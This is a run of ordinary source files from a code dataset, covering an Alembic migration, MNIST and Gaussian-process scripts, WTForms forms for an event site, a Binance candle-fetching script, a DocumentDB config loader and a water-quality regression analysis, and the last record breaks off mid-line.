17:49:56.503392\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a44c41d47965'\ndown_revision = 'cf7a72c4d543'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('cross_course',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=40), nullable=False),\n sa.Column('course', sa.Float(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_unique_constraint(None, 'currency', ['iso'])\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'currency', type_='unique')\n op.drop_table('cross_course')\n # ### end Alembic commands ###\n","repo_name":"kadr/cross_course","sub_path":"migrations/versions/a44c41d47965_add_crocc_course_table.py","file_name":"a44c41d47965_add_crocc_course_table.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6938629942","text":"import tensorflow as tf\r\nfrom tensorflow.keras.datasets import mnist\r\n\r\n# Загрузка данных MNIST\r\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\r\n\r\n# Нормализация данных\r\nx_train = x_train / 255.0\r\nx_test = x_test / 255.0\r\n\r\n# Создание модели\r\nmodel = tf.keras.models.Sequential([\r\n tf.keras.layers.Flatten(input_shape=(28, 28)),\r\n tf.keras.layers.Dense(10, activation='softmax')\r\n])\r\n\r\n# Компиляция модели\r\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\r\n\r\n# Обучение модели\r\nmodel.fit(x_train, y_train, epochs=5, validation_data=(x_test, y_test))\r\n\r\n# Оценка качества модели на тестовой выборке\r\ntest_loss, test_acc = model.evaluate(x_test, y_test)\r\nprint('Test accuracy:', test_acc)","repo_name":"repalova/labs_AISystems","sub_path":"2/numerals.py","file_name":"numerals.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39985158892","text":"__author__ = 'Ronny Restrepo'\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# ==============================================================================\n# TALLY_AND_PLOT\n# ==============================================================================\ndef tally_and_plot(a, labels=None, prop=False,\n title=\"\", xlabel=\"\", ylabel=\"\",\n color=\"#04BAE3\", alpha=0.9):\n \"\"\"\n takes a 1-Dimensional array like object, and plots a bar graph of the\n tallies of the values in that array.\n\n You can specify if you want the tally counts, or if you want the proportions\n of each value (using the `prop` argument)\n\n :param a: {1D array}\n :param labels: {None or dictionary}{default=None}\n A dictionary that maps values to desired label names.\n eg:\n labels = {1: \"basketball\",\n 2: \"soccer\",\n 4: \"karate\"}\n\n This is used for the labels that appear in the x axis of the plot.\n\n If None (default), then it just used the unique values from `a`\n\n :param prop: {boolean} {default = False}\n If True, then it plots the proportions of each value, instead of tally\n counts\n\n :param title: {string}{defualt=\"\"}\n :param xlabel:{string}{defualt=\"\"}\n :param ylabel: {string}{defualt=\"\"}\n :param color: {string\"{default=\"#04BAE3\"}\n :param alpha: {float between 0 and 1}{default=0.9}\n\n :example:\n a = np.array([4, 2, 2, 1, 2, 2, 4])\n tally_and_plot(a, labels={1: \"basketball\", 2: \"soccer\", 4: \"karate\"},\n prop=True, xlabel=\"Sport\", ylabel=\"Proportion of people\",\n title=\"Proportion of people playing each sport\"\n )\n \"\"\"\n # ==========================================================================\n tally = np.array(np.unique(a, return_counts=True)).astype(float)\n\n # Replace tally counts with proportions of values if `prop` is set to True\n if prop:\n tally[1] = tally[1] / float(tally[1].sum())\n\n # Populate default values for labels if none provided\n if labels is None:\n labels = tally[0]\n else:\n labels = [labels[val] for val in tally[0]]\n\n plt.figure()\n plt.bar(range(len(tally[0])), tally[1],\n width=1, color=color, alpha=alpha)\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.axes().set_xticks(np.arange(len(labels)) + 0.5)\n plt.axes().set_xticklabels(labels)\n plt.minorticks_on()\n plt.grid(b=True, which='major', axis=\"y\", color='#666666', linestyle='-',\n alpha=0.9)\n plt.grid(b=True, which='minor', axis=\"y\", color='#999999', linestyle='-',\n alpha=0.6)\n plt.show()\n\n\n\n","repo_name":"ronrest/convenience_py","sub_path":"plot/tally_and_plot.py","file_name":"tally_and_plot.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"} +{"seq_id":"22539379025","text":"import pandas as pd\nimport numpy as np\nimport GPy\nfrom IPython.display import display\nfrom optimizer import RProp\n\ndef read_data(datasheet):\n x = pd.read_csv(datasheet+'.csv')\n a = x.values\n inputs = a[:, :-1]\n output = a[:, -1]\n output = output.reshape(-1, 1)\n return inputs, output\n\n\ndef RMSE(Y1, Y2):\n if Y1.shape == Y2.shape:\n return np.sqrt(np.sum((Y1-Y2)**2)/np.size(Y1))\n else:\n print('Shape Y1 ', Y1.shape, ' is different from shape Y2 ', Y2.shape)\n\n\ndef MAE(Y1, Y2):\n if Y1.shape == Y2.shape:\n return np.sum(np.abs(Y1-Y2))/np.size(Y1)\n else:\n print('Shape Y1 ', Y1.shape, ' is different from shape Y2 ', Y2.shape)\n\n\ndef test_model(Xr, Yr, n, Xt, Yt, m):\n kernel = GPy.kern.RBF(input_dim=Xr.shape[1], ARD=True)\n m_random = GPy.models.GPRegression(Xr[:n], Yr[:n], kernel, normalizer=True)\n m_random.rbf.lengthscale = [1, 1, 1, 60, 15000, 10, 3, 500] # [1, 1, 1, 1, 1, 1, 1, 100] # [1, 1, 1, 60, 15000, 10, 3, 500]\n m_random.optimize(RProp(max_iters=500), messages=True)\n m_random.optimize(messages=True)\n display(m_random)\n print(m_random.rbf.lengthscale)\n Yp_random = m_random.predict(Xr[:n])[0]\n Ytest_random = m_random.predict(Xt[:m])[0]\n print('training loss = ', RMSE(Yr[:n], Yp_random))\n print('test loss = ', RMSE(Yt[:m], Ytest_random))\n print('test MAE = ', MAE(Yt[:m], Ytest_random))\n unc = np.mean(np.sqrt(m_random.predict(Xr[:n])[1]))\n print('average uncertainty = ', unc)\n return m_random, kernel\n","repo_name":"yureel/GandALF","sub_path":"tools/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"7457294159","text":"from wtforms import Form, DateTimeField, StringField, SubmitField, HiddenField, RadioField, BooleanField, TextAreaField, FileField, validators\nfrom wtforms.validators import InputRequired, DataRequired, ValidationError, url\nfrom datetime import datetime\n\n# https://wtforms.readthedocs.io/en/stable/fields.html\n\nclass EventsForm(Form):\n eid = HiddenField(\"eid\", description=\"eid\")\n edatetime = DateTimeField(\"Date\", description=\"Date\", format=\"%Y-%m-%d %H:%M:%S\")\n title = StringField(\"Title\", description=\"Title\")\n duration = StringField(\"Duration\", description=\"Duration\")\n price = StringField(\"Price\", description=\"Price\")\n elimit = StringField(\"Limit\", description=\"Limit\")\n location = StringField(\"Location\", description=\"Location\", default=\"400 E. Division St. Ste 100 Arlington, TX 76011\")\n image = HiddenField(\"Image Path\", description=\"Image Path\")\n description = TextAreaField(\"Description\", description=\"Description\")\n price_text = StringField(\"Variable\", description=\"Variable time or price\")\n # (time) Feb 6 3-5pm, Feb 6 6-8pm, Feb 7 1-3pm, Feb 7 4-6pm, test\n # (price) one red @ $10, two blue @ $5, a bird @ $20\n tags = StringField(\"Tags\", description=\"Tags: home, cart, fluid-art, alcohol-ink OR invisible\")\n extra_data = HiddenField(\"\", description=\"\")\n submit = SubmitField(\"Next\", description=\"Next\")\n #abc = StringField('abc', [InputRequired()], render_kw={\"placeholder\": \"test\"})\n\nclass ImageForm(Form):\n related_id = HiddenField(\"related_id\", description=\"related_id\")\n image = FileField(\"Upload File\")\n submit = SubmitField(\"Submit\", description=\"Submit\")\n\nclass RegistrationForm(Form):\n rid = HiddenField(\"rid\", description=\"rid\")\n order_id = HiddenField(\"Order ID\", description=\"Order ID\")\n camper1_name = StringField(\"Camper Name\", description=\"Camper Name\")\n camper1_age = StringField(\"Camper Age\", description=\"Camper Age\")\n camper1_grade = StringField(\"Camper Grade\", description=\"Camper Grade\")\n camper2_name = StringField(\"Camper 2 Name\", description=\"Camper 2 Name\")\n camper2_age = StringField(\"Camper 2 Age\", description=\"Camper 2 Age\")\n camper2_grade = StringField(\"Camper 2 Grade\", description=\"Camper 2 Grade\")\n camper3_name = StringField(\"Camper 3 Name\", description=\"Camper 3 Name\")\n camper3_age = StringField(\"Camper 3 Age\", description=\"Camper 3 Age\")\n camper3_grade = StringField(\"Camper 3 Grade\", description=\"Camper 3 Grade\")\n parent_name = StringField(\"Name\", description=\"Name\")\n parent_address = StringField(\"Address\", description=\"Address\")\n parent_city = StringField(\"City\", description=\"City\")\n parent_state = StringField(\"State\", description=\"State\")\n parent_zip = StringField(\"Zip Code\", description=\"Zip Code\")\n parent_email = StringField(\"Email\", description=\"Email\")\n parent_phone = StringField(\"Phone\", description=\"Phone\")\n parent_em_name = StringField(\"Emergency Contact Person\", description=\"Emergency Contact Person\")\n parent_em_phone = StringField(\"Emergency Phone\", description=\"Emergency Phone\")\n pickup1_name = StringField(\"Name\", description=\"Name\")\n pickup1_phone = StringField(\"Phone\", description=\"Phone\")\n pickup2_name = StringField(\"Name 2\", description=\"Name 2\")\n pickup2_phone = StringField(\"Phone 2\", description=\"Phone 2\")\n session1 = BooleanField(\"Week 1: June 22 - 26, 2020\", description=\"session 1\")\n session2 = BooleanField(\"Week 2: July 13 - 17, 2020\", description=\"session 2\")\n treatment_permission = BooleanField(\"Emergency Treatment Permission\", description=\"\")\n photo_release = BooleanField(\"Photo/Social Media Release\", description=\"\")\n signature = StringField(\"Signature\", description=\"\")\n submit = SubmitField(\"Submit\", description=\"Submit\")\n\n\nclass ProductsForm(Form):\n pid = HiddenField(\"pid\", description=\"\")\n name = StringField(\"Name\", description=\"\")\n description = TextAreaField(\"Description\", description=\"\")\n image_path_array = HiddenField(\"Image Path Array\", description=\"Add one or multiple images\")\n inventory = StringField(\"Inventory\", description=\"How many items remaining in stock. This value will change automatically as people buy\")\n price = StringField(\"Price\", description=\"Product price before discounts. This can be overridden\")\n keywords_array = StringField(\"Keywords Array\", description=\"Comma-separated list of descriptive one-word keywords\")\n active = StringField(\"Active\", description=\"\")\n submit = SubmitField(\"Next\", description=\"Next\")\n\n\nclass BookingForm(Form):\n id = HiddenField(\"id\", description=\"id\")\n order_id = HiddenField(\"order_id\", description=\"order_id\")\n eid = HiddenField(\"eid\", description=\"event_id\")\n create_time = HiddenField(\"create_time\", description=\"create_time\")\n email = StringField(\"email\", description=\"email\")\n first_name = StringField(\"first_name\", description=\"first_name\")\n last_name = StringField(\"last_name\", description=\"last_name\")\n quantity = StringField(\"quantity\", description=\"Total number of guests in this order\")\n cost = StringField(\"cost\", description=\"optional field\")\n paid = StringField(\"paid\", description=\"optional field\")\n guest_list = StringField(\"guest_list\", description=\"Guest list optional\")\n variable_time = StringField(\"variable_time\", description=\"Variable time optional\")\n extra_data = StringField(\"extra_data\", description=\"Extra data optional\")\n transaction_id = StringField(\"transation_id\", description=\"transaction id\")\n buyer_name = StringField(\"buyer_name\", description=\"Buyer name optional\")\n buyer_phone = StringField(\"buyer_phone\", description=\"Buyer phone optional\")\n submit = SubmitField(\"Next\", description=\"Next\")\n\n","repo_name":"mmarum/cca","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25597266179","text":"import pandas as pd\r\nimport numpy as np\r\nimport torch\r\nimport pickle\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom error import BinanceMaxCandlesError, BeforeOperationError, NotEnoughCandlesError, NotEnoughCandlesFromBinanceError\r\nimport cryptocurrencies_setup\r\nimport binance_client_setup\r\nfrom utils import flush\r\n\r\n# when we want to retrieve a finite number of candles from Binance API, let's say N,\r\n# we are restricted to:\r\n# - the datetime we want to start getting data\r\n# - the candle size, for instance, 15m, 1h, 4h, and so on\r\n# then we need to use a base unit (this case minutes) to predict if the combination of arguments\r\n# allow us to retrieve N candles considering the starting datetime and candle sizes\r\n# so, this variable help us to cast every candle size into minutes,\r\n# this way, if we want to get 10 candles of \"1h\" size\r\n# we know that \"1h\" is equivalent to 60 minutes, and then,\r\n# we will require 10 * 60 = 600 minutes minimum\r\n# and the starting datetime should be, at least,\r\n# 600 minutes backwards of the moment we made the request\r\nconverter = {\"15m\": 1/4 * 60, \"1h\": 1 * 60, \"4h\": 4 * 60}\r\n\r\n\r\ndef get_candles(symbol: str, start: pd.Timestamp, candles_amount: int, candles_size: str):\r\n \"\"\"\r\n Retrieves candles of a cryptocurrency pair from Binance API\r\n\r\n Parameters\r\n ----------\r\n symbol: str\r\n The cryptocurrency pair to retrieve\r\n start: pandas.Timestamp\r\n The datetime to start retrieving candles\r\n candles_amount: int\r\n Amount of candles to retrieve\r\n candles_size: str\r\n The size of the candles to retrieve, either, 15m, 30m, and so on.\r\n\r\n Raises\r\n ------\r\n error.BeforeOperationError\r\n If the starting datetime to request candles is before the existence of the cryptocurrency pair \r\n error.NotEnoughCandlesError\r\n If the combination of starting datetime to retrieve candles and the candle size itself doesn't allow to retrieve the indicated number of candles\r\n error.NotEnoughCandlesFromBinanceError\r\n If retrieved candles from Binance API are less than expected (even having the right arguments)\r\n \"\"\"\r\n # if candles_amount > BinanceMaxCandlesError.max_candles_to_retrieve:\r\n # raise BinanceMaxCandlesError(candles_amount)\r\n\r\n today = pd.Timestamp.today()\r\n symbol_beginning = cryptocurrencies_setup.beginnings[symbol]\r\n\r\n if start < symbol_beginning:\r\n raise BeforeOperationError(\r\n symbol=symbol, beginning=cryptocurrencies_setup.beginnings[symbol], start=start)\r\n\r\n elapsed = (today - start)\r\n candles = int(\r\n np.floor(elapsed / pd.Timedelta(converter[candles_size], \"m\")))\r\n\r\n if candles < candles_amount:\r\n raise NotEnoughCandlesError(\r\n symbol=symbol, candles_size=candles_size, start=start)\r\n\r\n candles_left = candles_amount\r\n bars = np.empty((0, 12), float)\r\n\r\n while candles_left:\r\n candles_to_retrieve = candles_left\r\n\r\n if candles_left > BinanceMaxCandlesError.max_candles_to_retrieve:\r\n candles_to_retrieve = BinanceMaxCandlesError.max_candles_to_retrieve\r\n\r\n retrieved_bars = binance_client_setup.client.get_klines(\r\n symbol=symbol, interval=candles_size, startTime=int(start.timestamp()), limit=candles_to_retrieve)\r\n bars = np.append(bars, retrieved_bars, axis=0)\r\n candles_left -= candles_to_retrieve\r\n\r\n if len(bars) < candles_amount:\r\n raise NotEnoughCandlesFromBinanceError(\r\n candles_size=candles_size, symbol=symbol)\r\n\r\n return bars.tolist()\r\n\r\n\r\ndef trending(closings: np.array):\r\n \"\"\"\r\n Recognizes the trending of a cryptocurrency pair market\r\n\r\n Parameters\r\n ----------\r\n closings: numpy.array\r\n 2D dimensional array where rows are \r\n \"\"\"\r\n\r\n # because we don't have the independent variable\r\n # (we only have the outputs those are the closings)\r\n # we must make it\r\n # this way, x=0 maps to y=closings[0]\r\n # then x=1 maps to y=closings[1], and so on\r\n timestamps = np.arange(closings.shape[0]).reshape(-1, 1)\r\n regression = LinearRegression().fit(timestamps, closings)\r\n\r\n # once regression is done, we standarize the slope\r\n # this way, values will be independent of output magnitudes\r\n slope = regression.coef_[0]\r\n timestamps_standard_deviation = np.std(timestamps)\r\n closings_standard_deviation = np.std(closings)\r\n standarized_slope = slope * timestamps_standard_deviation / \\\r\n closings_standard_deviation\r\n\r\n # upward trend when standarized_slope >= 0.5 returns 1\r\n # downward trend when standarized_slope <= -0.5 returns -1\r\n # neither upward nor downward trend returns 0\r\n return 1 * (standarized_slope >= 0.5) + -1 * (standarized_slope <= -0.5), regression\r\n\r\n\r\ndef get_exercises(exercises_amount: int, candles_amount: int = 512, candles_size: str = \"15m\"):\r\n \"\"\"\r\n Generates exercises retrieving candles from Binance API to predict the tendence\r\n \"\"\"\r\n\r\n # gets all available symbols from Binance\r\n symbols = list(cryptocurrencies_setup.beginnings.keys())\r\n x_training = []\r\n y_training = []\r\n\r\n exercises_created = 0\r\n\r\n while exercises_created < exercises_amount:\r\n # choose random symbol to workout\r\n random_index = torch.randint(\r\n low=0, high=len(symbols), size=(1,))[0].item()\r\n symbol = symbols[random_index]\r\n\r\n # if we want to get 200 candles of 15m starting from today, we couldn't\r\n # because we can't get data that doesn't exist in Binance yet\r\n # this way, we must request the candles, at least, 200 * 15 minutes = 3000 minutes before today\r\n # now, we could request candles from the beginning of the cryptocurrency until today minus 3000 minutes\r\n # in general, the range would be [today, today - candles to retrieve * candle_frame]\r\n # in this case, we use minutes as basic unit time\r\n # that's the reason why we use a converter because if we have a candle frame like 1h\r\n # it will be converted as 60 (minutes).\r\n today = pd.Timestamp.today()\r\n limit_datetime = today - \\\r\n pd.DateOffset(minutes=converter[candles_size]*candles_amount)\r\n minutes_range = np.ceil(pd.Timedelta(\r\n limit_datetime - cryptocurrencies_setup.beginnings[symbol]).total_seconds() / 60).astype(int)\r\n\r\n # minutes range could be negative\r\n # it means that the cryptocurrency is too new\r\n # then, there are not enough data to retrieve\r\n if minutes_range < 0:\r\n continue\r\n\r\n # we choose a random minute between [0, minutes_range]\r\n # this will add up minutes from the beginning of operations of the cryptocurrency\r\n # this way, we will choose random dates depending on how much minutes we want to be far away from the beginning\r\n random_minutes = torch.randint(\r\n low=0, high=minutes_range, size=(1,))[0].item()\r\n start = cryptocurrencies_setup.beginnings[symbol] + \\\r\n pd.DateOffset(minutes=random_minutes)\r\n\r\n # request candles from Binance\r\n try:\r\n # progress bar\r\n percentage = int(round((exercises_created+1) /\r\n exercises_amount * 100, 0))\r\n print(\"{step: >5}/{steps: <5} [{percentage}%] making exercise with {symbol}\".format(\r\n step=exercises_created+1, steps=exercises_amount, percentage=percentage, symbol=symbol), end=\"\")\r\n\r\n # retrieved bars from Binance API\r\n bars = get_candles(symbol=symbol, start=start,\r\n candles_amount=candles_amount, candles_size=candles_size)\r\n bars = np.array(bars).astype(float)\r\n closings = bars[:, 4]\r\n\r\n # consider the following indexes\r\n # bars[i][1] = open\r\n # bars[i][2] = high\r\n # bars[i][3] = low\r\n # bars[i][4] = close\r\n # bars[i][5] = volume\r\n # with that, we flatten the data and order will keep\r\n # but with the following indexes\r\n # x_training[i][j][0] = open\r\n # x_training[i][j][1] = high\r\n # x_training[i][j][2] = low\r\n # x_training[i][j][3] = close\r\n # x_training[i][j][4] = volume\r\n trend, _ = trending(closings)\r\n x_training.append(bars[:,:6])\r\n y_training.append(trend)\r\n\r\n # clear the output to print in the same line\r\n # otherwise (reaching the end) prints out a new line\r\n flush(exercises_created, exercises_amount)\r\n\r\n # increase the amount of exercises created\r\n exercises_created += 1\r\n\r\n except NotEnoughCandlesFromBinanceError:\r\n print(\r\n f\"[ERROR] candle size: {candles_size} candles_amount: {candles_amount} symbol: {symbol} start: {start}\")\r\n\r\n return x_training, y_training\r\n\r\n\r\ndef build_exercises(exercises_amount, candles_amount):\r\n # gets training data\r\n x_training, y_training = get_exercises(\r\n exercises_amount=exercises_amount, candles_amount=candles_amount)\r\n\r\n # persist data into pickles\r\n with open(\"training/x_training.pickle\", \"wb\") as f:\r\n pickle.dump(x_training, f)\r\n with open(\"training/y_training.pickle\", \"wb\") as f:\r\n pickle.dump(y_training, f)\r\n","repo_name":"cooperaty/ai-trainer","sub_path":"exercises_builder.py","file_name":"exercises_builder.py","file_ext":"py","file_size_in_byte":9367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"26128718655","text":"from dataclasses import dataclass\nfrom pathlib import Path\nimport ruamel.yaml\nfrom typing import List\nfrom typing import Union\n\n\n@dataclass(frozen=True)\nclass DocumentDBConfig:\n \"\"\"\n Configuration for a DocumentDB cluster.\n\n Includes internal fields used for configuration.\n \"\"\"\n\n admin_user: str\n admin_password: str\n endpoint: str\n hosts: List[str]\n port: int\n\n @staticmethod\n def load(config_path: Union[Path, str]):\n config_path = Path(config_path)\n\n with open(config_path) as config_file:\n yaml = ruamel.yaml.YAML(typ=\"safe\", pure=True)\n config_dict = yaml.load(config_file)\n\n return DocumentDBConfig.parse(config_dict)\n\n @staticmethod\n def parse(config_dict: dict):\n return DocumentDBConfig(\n admin_user=config_dict[\"admin_user\"],\n admin_password=config_dict[\"admin_password\"],\n endpoint=config_dict[\"endpoint\"],\n hosts=config_dict[\"hosts\"],\n port=config_dict[\"port\"],\n )\n\n\n@dataclass(frozen=True)\nclass DocumentDBClientConfig:\n \"\"\"\n Configuration for a DocumentDB cluster.\n\n Excludes internal fields that a client should not access.\n \"\"\"\n\n endpoint: str\n hosts: List[str]\n port: int\n\n @staticmethod\n def load(config_path: Union[Path, str]):\n config_path = Path(config_path)\n\n with open(config_path) as config_file:\n yaml = ruamel.yaml.YAML(typ=\"safe\", pure=True)\n config_dict = yaml.load(config_file)\n\n return DocumentDBClientConfig.parse(config_dict)\n\n @staticmethod\n def parse(config_dict: dict):\n return DocumentDBClientConfig(\n endpoint=config_dict[\"endpoint\"],\n hosts=config_dict[\"hosts\"],\n port=config_dict[\"port\"],\n )\n","repo_name":"uwscope/scope-web","sub_path":"scope_shared/scope/config/documentdb.py","file_name":"documentdb.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3430748982","text":"\r\nimport os\r\nos.chdir(r'C:\\Users\\ASUS-PC\\Documents\\Python op')\r\n\r\nimport numpy as np \r\nimport pandas as pd\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\ndata=pd.read_csv('water_data.csv',encoding=\"ISO-8859-1\")\r\ndata.fillna(0, inplace=True)\r\ndata.head()\r\n\r\ndata['Temp']=pd.to_numeric(data['Temp'],errors='coerce')\r\ndata['D.O. (mg/l)']=pd.to_numeric(data['D.O. (mg/l)'],errors='coerce')\r\ndata['PH']=pd.to_numeric(data['PH'],errors='coerce')\r\ndata['B.O.D. (mg/l)']=pd.to_numeric(data['B.O.D. (mg/l)'],errors='coerce')\r\ndata['CONDUCTIVITY (µmhos/cm)']=pd.to_numeric(data['CONDUCTIVITY (µmhos/cm)'],errors='coerce')\r\ndata['NITRATENAN N+ NITRITENANN (mg/l)']=pd.to_numeric(data['NITRATENAN N+ NITRITENANN (mg/l)'],errors='coerce')\r\ndata['TOTAL COLIFORM (MPN/100ml)Mean']=pd.to_numeric(data['TOTAL COLIFORM (MPN/100ml)Mean'],errors='coerce')\r\n\r\n\r\nstart=2\r\nend=1992\r\nstation=data.iloc [start:end ,0]\r\nlocation=data.iloc [start:end ,1]\r\nstate=data.iloc [start:end ,2]\r\ndo= data.iloc [start:end ,4].astype(np.float64)\r\nvalue=0\r\nph = data.iloc[ start:end,5] \r\nco = data.iloc [start:end ,6].astype(np.float64) \r\nyear=data.iloc[start:end,11]\r\ntc=data.iloc [2:end ,10].astype(np.float64)\r\nbod = data.iloc [start:end ,7].astype(np.float64)\r\nna= data.iloc [start:end ,8].astype(np.float64)\r\nna.dtype\r\n\r\ndata.head()\r\n\r\ndata=pd.concat([station,location,state,do,ph,co,bod,na,tc,year],axis=1)\r\ndata. columns = ['station','location','state','do','ph','co','bod','na','tc','year']\r\n\r\ndata['npH']=data.ph.apply(lambda x: (100 if (8.5>=x>=7) \r\n else(80 if (8.6>=x>=8.5) or (6.9>=x>=6.8) \r\n else(60 if (8.8>=x>=8.6) or (6.8>=x>=6.7) \r\n else(40 if (9>=x>=8.8) or (6.7>=x>=6.5)\r\n else 0)))))\r\n\r\ndata['ndo']=data.do.apply(lambda x:(100 if (x>=6) \r\n else(80 if (6>=x>=5.1) \r\n else(60 if (5>=x>=4.1)\r\n else(40 if (4>=x>=3) \r\n else 0)))))\r\n\r\ndata['nco']=data.tc.apply(lambda x:(100 if (5>=x>=0) \r\n else(80 if (50>=x>=5) \r\n else(60 if (500>=x>=50)\r\n else(40 if (10000>=x>=500) \r\n else 0)))))\r\n\r\ndata['nbdo']=data.bod.apply(lambda x:(100 if (3>=x>=0) \r\n else(80 if (6>=x>=3) \r\n else(60 if (80>=x>=6)\r\n else(40 if (125>=x>=80) \r\n else 0)))))\r\n\r\ndata['nec']=data.co.apply(lambda x:(100 if (75>=x>=0) \r\n else(80 if (150>=x>=75) \r\n else(60 if (225>=x>=150)\r\n else(40 if (300>=x>=225) \r\n else 0)))))\r\n\r\ndata['nna']=data.na.apply(lambda x:(100 if (20>=x>=0) \r\n else(80 if (50>=x>=20) \r\n else(60 if (100>=x>=50)\r\n else(40 if (200>=x>=100) \r\n else 0)))))\r\n\r\ndata.head()\r\ndata.dtypes\r\n\r\ndata['wph']=data.npH * 0.165\r\ndata['wdo']=data.ndo * 0.281\r\ndata['wbdo']=data.nbdo * 0.234\r\ndata['wec']=data.nec* 0.009\r\ndata['wna']=data.nna * 0.028\r\ndata['wco']=data.nco * 0.281\r\ndata['wqi']=data.wph+data.wdo+data.wbdo+data.wec+data.wna+data.wco \r\ndata\r\n\r\nag=data.groupby('year')['wqi'].mean()\r\n\r\nag.head()\r\n\r\ndata=ag.reset_index(level=0,inplace=False)\r\ndata\r\n\r\nyear=data['year'].values\r\nAQI=data['wqi'].values\r\ndata['wqi']=pd.to_numeric(data['wqi'],errors='coerce')\r\ndata['year']=pd.to_numeric(data['year'],errors='coerce')\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.rcParams['figure.figsize'] = (20.0, 10.0)\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfig = plt.figure()\r\nax = Axes3D(fig)\r\nax.scatter(year,AQI, color='red')\r\nplt.show()\r\ndata\r\n\r\ndata = data[np.isfinite(data['wqi'])]\r\ndata.head()\r\n\r\ncols =['year']\r\ny = data['wqi']\r\nx=data[cols]\r\n\r\nplt.scatter(x,y)\r\nplt.show()\r\n\r\nimport matplotlib.pyplot as plt\r\ndata=data.set_index('year')\r\ndata.plot(figsize=(15,6))\r\nplt.show()\r\n\r\nfrom sklearn import neighbors,datasets\r\ndata=data.reset_index(level=0,inplace=False)\r\ndata\r\n\r\nfrom sklearn import linear_model\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ncols =['year']\r\n\r\ny = data['wqi']\r\nx=data[cols]\r\nreg=linear_model.LinearRegression()\r\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2,random_state=0)\r\nreg.fit(x_train,y_train)\r\na=reg.predict(x_test)\r\na\r\n\r\ny_test\r\n\r\nfrom sklearn.metrics import mean_squared_error\r\nprint('mse:%.2f'%mean_squared_error(y_test,a))\r\n\r\ndt = pd.DataFrame({'Actual': y_test, 'Predicted': a}) \r\n\r\nx = (x - x.mean()) / x.std()\r\nx = np.c_[np.ones(x.shape[0]), x]\r\nx\r\n\r\nalpha = 0.1 #Step size\r\niterations = 3000 #No. of iterations\r\nm = y.size #No. of data points\r\nnp.random.seed(4) #Setting the seed\r\ntheta = np.random.rand(2) #Picking some random values to start with\r\n\r\ndef gradient_descent(x, y, theta, iterations, alpha):\r\n past_costs = []\r\n past_thetas = [theta]\r\n for i in range(iterations):\r\n prediction = np.dot(x, theta)\r\n error = prediction - y\r\n cost = 1/(2*m) * np.dot(error.T, error)\r\n past_costs.append(cost)\r\n theta = theta - (alpha * (1/m) * np.dot(x.T, error))\r\n past_thetas.append(theta)\r\n \r\n return past_thetas, past_costs\r\n\r\npast_thetas, past_costs = gradient_descent(x, y, theta, iterations, alpha)\r\ntheta = past_thetas[-1]\r\n\r\n#Print the results...\r\nprint(\"Gradient Descent: {:.2f}, {:.2f}\".format(theta[0], theta[1]))\r\n\r\nplt.title('Cost Function J')\r\nplt.xlabel('No. of iterations')\r\nplt.ylabel('Cost')\r\nplt.plot(past_costs)\r\nplt.show()\r\n\r\n\r\nimport numpy as np\r\nnewB=[74.92, 4.24]\r\n\r\ndef rmse(y,y_pred):\r\n rmse= np.sqrt(sum(y-y_pred))\r\n return rmse\r\n \r\n\r\ny_pred=x.dot(newB)\r\n\r\ndt = pd.DataFrame({'Actual': y, 'Predicted': y_pred}) \r\ndt=pd.concat([data, dt], axis=1)\r\ndt\r\n\r\nfrom sklearn import metrics\r\nprint(np.sqrt(metrics.mean_squared_error(y,y_pred)))\r\n\r\nx_axis=dt.year\r\ny_axis=dt.Actual\r\ny1_axis=dt.Predicted\r\nplt.scatter(x_axis,y_axis)\r\nplt.plot(x_axis,y1_axis,color='r')\r\nplt.title(\"linear regression\")\r\n\r\nplt.show()\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.metrics import confusion_matrix,r2_score,mean_gamma_deviance,explained_variance_score,max_error\r\n\r\nprint(\" \")\r\nprint(\"Linear Regression:\")\r\nprint(\"R2 Score:\",r2_score(y,y_pred))\r\nprint(\"Root Mean Sqaure:\",np.sqrt(mean_squared_error(y,y_pred)))\r\nprint(\"Explained Variance Score:\",explained_variance_score(y,y_pred))\r\nprint(\"Max Error:\",max_error(y,y_pred))\r\nprint(\"Mean Gamma Devience:\",mean_gamma_deviance(y,y_pred))\r\nprint(\"---------------------------------------------------------------------\")\r\nprint(\" \")\r\n\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree=4)\r\nX_poly = poly_reg.fit_transform(x_train)\r\npol_reg = LinearRegression()\r\npol_reg.fit(X_poly, y_train)\r\nb = 